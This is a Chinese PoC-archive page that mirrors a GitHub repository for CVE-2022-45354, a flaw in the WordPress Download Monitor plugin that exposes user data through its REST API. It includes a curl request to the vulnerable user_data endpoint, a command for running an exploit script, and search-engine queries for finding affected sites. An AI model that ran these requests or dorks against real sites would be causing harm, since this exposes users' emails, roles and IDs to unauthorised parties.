POC详情: 6c2af9e898a619b9482d29cd7e3f778a3cd9246c

来源
https://github.com/NekomataCode/CVE-2022-45354
关联漏洞
标题: WordPress Plugin Download Monitor 信息泄露漏洞 (CVE-2022-45354)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin Download Monitor 存在信息泄露漏洞。目前尚无此漏洞的相关信息,请随时关注CNNVD或厂商公告。
描述
CVE-2022-45354 Download Monitor <= 4.7.60  - Sensitive Information Exposure via REST API
介绍
# CVE-2022-45354
### Download Monitor <= 4.7.60 - Sensitive Information Exposure via REST API (CVE-2022-45354:version)

**Detail**: **CVE-2022-45354:version** matched at http://wordpress.lan

**Protokol**: HTTP

**Full URL**: http://wordpress.lan/wp-content/plugins/download-monitor/readme.txt

**Informasi Tambahan**

| Key | Value |
| --- | --- |
| Nama | Download Monitor <= 4.7.60 - Sensitive Information Exposure via REST API |
| Tag | cve, wordpress, wp-plugin, download-monitor, medium |
| Tingkat | medium |
| Deskripsi | Plugin Download Monitor untuk WordPress rentan terhadap Paparan Informasi Sensitif dalam versi hingga, dan termasuk, 4.7.60 melalui REST API. Hal ini memungkinkan penyerang yang tidak diautentikasi mengekstrak data sensitif termasuk laporan pengguna, laporan unduhan, dan data pengguna termasuk email, peran, id, dan info lainnya (bukan kata sandi) |
| CVSS-Metrics | [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N) |
| CVE-ID | [CVE-2022-45354](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2022-45354) |
| CVSS-Score | 5.40 |
| fofa-query | wp-content/plugins/download-monitor/ |
| google-query | inurl:"/wp-content/plugins/download-monitor/" |
| shodan-query | vuln:CVE-2022-45354 |

**CURL command untuk mengecek kerentanan**
```sh
curl -X 'GET' -d '' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36' 'http://target.com/wp-json/download-monitor/v1/user_data'
```

**Execute Script**
<p>Penggunaan default tanpa parameter -o disimpan didalam "downloads"</p>

```sh
python3 exploit.py https://target.com -o folder_name
```
<br>
<p>Fixed by nekomatacode</p>
文件快照

 [4.0K]  /data/pocs/6c2af9e898a619b9482d29cd7e3f778a3cd9246c
├── [3.2K]  exploit,py
├── [1.0K]  LICENSE
└── [1.8K]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。